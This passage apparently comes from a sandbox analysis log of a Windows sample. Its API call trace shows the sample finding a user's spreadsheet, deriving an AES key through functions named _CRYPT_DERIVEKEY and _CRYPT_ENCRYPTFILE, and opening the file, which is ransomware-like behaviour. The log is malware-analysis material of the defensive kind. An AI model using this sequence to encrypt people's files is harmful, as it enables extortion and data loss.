hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0176.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0176.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0176.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.646] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0176.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0176.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0176.646] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0176.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0176.646] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0176.646] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0176.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0176.646] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0176.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.647] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843dbca0, ftCreationTime.dwHighDateTime=0x1d59ce5, ftLastAccessTime.dwLowDateTime=0xe379aeb0, ftLastAccessTime.dwHighDateTime=0x1d59de2, ftLastWriteTime.dwLowDateTime=0xe379aeb0, ftLastWriteTime.dwHighDateTime=0x1d59de2, nFileSizeHigh=0x0, nFileSizeLow=0x13c5c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uKjh6aasKg.xlsx", cAlternateFileName="UKJH6A~1.XLS")) returned 0x90add8 [0176.649] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0176.649] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843dbca0, ftCreationTime.dwHighDateTime=0x1d59ce5, ftLastAccessTime.dwLowDateTime=0xe379aeb0, ftLastAccessTime.dwHighDateTime=0x1d59de2, ftLastWriteTime.dwLowDateTime=0xe379aeb0, ftLastWriteTime.dwHighDateTime=0x1d59de2, nFileSizeHigh=0x0, nFileSizeLow=0x13c5c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uKjh6aasKg.xlsx", cAlternateFileName="UKJH6A~1.XLS")) returned 0x90add8 [0176.649] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0176.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uKjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kjh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jh6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aasKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="asKg.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.651] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0176.651] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0176.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.652] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843dbca0, ftCreationTime.dwHighDateTime=0x1d59ce5, ftLastAccessTime.dwLowDateTime=0xe379aeb0, ftLastAccessTime.dwHighDateTime=0x1d59de2, ftLastWriteTime.dwLowDateTime=0xe379aeb0, ftLastWriteTime.dwHighDateTime=0x1d59de2, nFileSizeHigh=0x0, nFileSizeLow=0x13c5c, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="uKjh6aasKg.xlsx", cAlternateFileName="UKJH6A~1.XLS")) returned 0x90af58 [0176.652] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0176.652] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.652] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.652] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0176.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0176.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.653] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0176.654] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0176.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.654] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0176.654] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.663] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.663] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.663] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0176.663] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0176.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.663] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.663] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0176.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.663] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.664] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0176.664] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.664] CryptDestroyHash (hHash=0x90ae18) returned 1 [0176.665] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ukjh6aaskg.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.665] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.665] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0176.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0176.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0176.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0176.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0176.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0176.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0176.666] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0176.666] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0176.666] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0176.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0176.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0176.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0176.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0176.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0176.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0176.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0176.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: 